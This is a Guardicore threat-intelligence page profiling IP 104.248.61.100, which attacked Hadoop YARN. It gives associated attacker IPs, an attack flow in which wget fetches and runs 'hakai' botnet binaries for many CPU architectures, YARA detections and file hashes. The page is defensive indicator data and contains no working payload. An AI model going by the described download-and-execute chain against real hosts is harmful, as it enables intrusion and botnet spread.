IP Address: 104.248.61.100Previously Malicious

Weekly Summary

Browse or download a weekly review of our cyber threat intelligence data and gain more insight to help protect your network

Top Threats

Cyber Threat Intelligence

Discover Malicious IPs and Domains with Guardicore Cyber Threat Feed

IP Address:
104.248.61.100​
Previously Malicious

This IP address attempted an attack on a machine protected by Guardicore Centra

Threat Information

Role

Attacker, Scanner

Services Targeted

HadoopYARN

Tags

HTTP HadoopYARN Malicious File IDS - Web Application Attack Outgoing Connection Download and Allow Execution Download and Execute Download File Inbound HTTP Request

Associated Attack Servers

52.170.223.233 13.81.220.89 40.68.244.223 52.233.181.5 159.65.248.217 40.68.86.94 52.166.206.33

Basic Information

IP Address

104.248.61.100

Domain

-

ISP

Digital Ocean

Country

United States

WHOIS

Created Date

-

Updated Date

-

Organization

-

First seen in Guardicore Centra

2018-11-25

Last seen in Guardicore Centra

2018-12-16

What is Guardicore Centra
Guardicore Centra is a data center and cloud security solution that protects the organization's core assets, using flexible, quickly deployed and easy to understand micro-segmentation controls. Centra generates in-context security incidents, with details on attacker tools and techniques, that help IR teams prioritize incident investigation and reduce dwell time. Learn More

Attack Flow

Process /usr/bin/wget generated outgoing network traffic to: 159.65.248.217:80 14 times

Outgoing Connection

The file /tmp/bins.sh was downloaded and granted execution privileges

Download and Allow Execution

The file /tmp/mysql.sock.lock was downloaded and granted execution privileges

The file /tmp/hakai.mips was downloaded and granted execution privileges

Download and Allow Execution

/tmp/hakai.mips was identified as malicious by YARA according to rules: 000 Common Rules

Malicious File

IDS detected Web Application Attack : 401TRG Generic Webshell Request - POST with wget in body

IDS - Web Application Attack

The file /tmp/hakai.mpsl was downloaded and granted execution privileges

Download and Allow Execution

/tmp/hakai.mpsl was identified as malicious by YARA according to rules: 000 Common Rules

Malicious File

The file /tmp/hakai.sh4 was downloaded and granted execution privileges

Download and Allow Execution

/tmp/hakai.sh4 was identified as malicious by YARA according to rules: 000 Common Rules

Malicious File

The file /tmp/hakai.x86 was downloaded and granted execution privileges

Download and Allow Execution

/tmp/hakai.x86 was identified as malicious by YARA according to rules: Maldoc Somerules and 000 Common Rules

Malicious File

The file /tmp/hakai.arm6 was downloaded and granted execution privileges

Download and Allow Execution

/tmp/hakai.arm6 was identified as malicious by YARA according to rules: 000 Common Rules

Malicious File

The file /tmp/hakai.x86_64 was downloaded and executed 11 times

Download and Execute

Process /tmp/hakai.x86_64 generated outgoing network traffic to: 159.65.248.217:1991

Outgoing Connection

The file /tmp/hakai.ppc was downloaded and granted execution privileges

Download and Allow Execution

/tmp/hakai.ppc was identified as malicious by YARA according to rules: 000 Common Rules

Malicious File

The file /tmp/hakai.m68k was downloaded and granted execution privileges

Download and Allow Execution

/tmp/hakai.m68k was identified as malicious by YARA according to rules: 000 Common Rules

Malicious File

The file /tmp/hakai.arm4 was downloaded and granted execution privileges

Download and Allow Execution

/tmp/hakai.arm4 was identified as malicious by YARA according to rules: 000 Common Rules

Malicious File

The file /tmp/hakai.arm5 was downloaded and granted execution privileges

Download and Allow Execution

/tmp/hakai.arm5 was identified as malicious by YARA according to rules: 000 Common Rules

Malicious File

The file /tmp/hakai.arm7 was downloaded and granted execution privileges

Download and Allow Execution

/tmp/hakai.arm7 was identified as malicious by YARA according to rules: 000 Common Rules

Malicious File

The file /tmp/hakai.dbg was downloaded and executed 9 times

Download and Execute

Connection was closed due to timeout

/tmp/hakai.dbg was identified as malicious by YARA according to rules: Malw Miscelanea Linux, Suspicious Strings and 000 Common Rules

Malicious File

/tmp/hakai.x86_64 was identified as malicious by YARA according to rules: 000 Common Rules

Malicious File

Associated Files

/tmp/bins.sh

SHA256: 46177b02fa444885e9f9ca29666d7a8291223b0b2a598784475a4d136b6f40ca

1918 bytes

/tmp/hakai.mips

SHA256: 187b7d7c43f998ab939bcedf6d7fcd27ca648d28389e300b018f4991a61d59e8

75704 bytes

/tmp/hakai.mpsl

SHA256: b53e2e6ea09ac8d1bf0a21751320a2480eaf2703ab27358447d8cf9cfcf1b503

76072 bytes

/tmp/hakai.sh4

SHA256: 66c8676eb8c7c11dad14a45ea8a7b70aece9a1ebd7252888dd07fd8192989814

60696 bytes

/tmp/hakai.x86

SHA256: f35bee6545e9afe4be8c0bc1076c728e977881e03e08d74c5b04c137eee14c1e

56924 bytes

/tmp/hakai.arm6

SHA256: 181484a7800111412181deccf0d71d758d7ea176d5e6824ddeb5943cc551eca5

60860 bytes

/tmp/hakai.x86_64

SHA256: 34f0f32609b7a8d877defd278fea25e255a5ed8394452afdbb1d10b8a43fb297

151403 bytes

/tmp/hakai.ppc

SHA256: 51124c5b5dba00c5508b5684751e619ce3dc53099bcecc08d318ce465d751e5d

58748 bytes

/tmp/hakai.m68k

SHA256: fe47630f6217cb40e750740e0c1501f30359e6e2b7181e3ddc36fc0a8a173114

56212 bytes

/tmp/hakai.arm4

SHA256: b6e31cabb88e4eabcc8168e32438963698dc56d1f26acc018a22b70806ee0db0

62892 bytes

/tmp/hakai.arm5

SHA256: 9d7d967c30a88eabb0af97ac3a477ab281c656cf91ce9b1a8d14233b7355a830

62952 bytes

/tmp/hakai.arm7

SHA256: 32cc7661ba3a440d3668f8cd498296e9d06acbb8c713559fda9e40a3047c105a

60860 bytes

/tmp/hakai.dbg

SHA256: 2a26648922948b3048af91e3d2c508e91775a94185a60cc5f3b6a5f2f8e3ded2

1019921 bytes

Oops! - Do you see your IP here? Contact us at labs@guardicore.com to remove it from the Threat Intelligence data.

IP Address: 104.248.61.100​Previously Malicious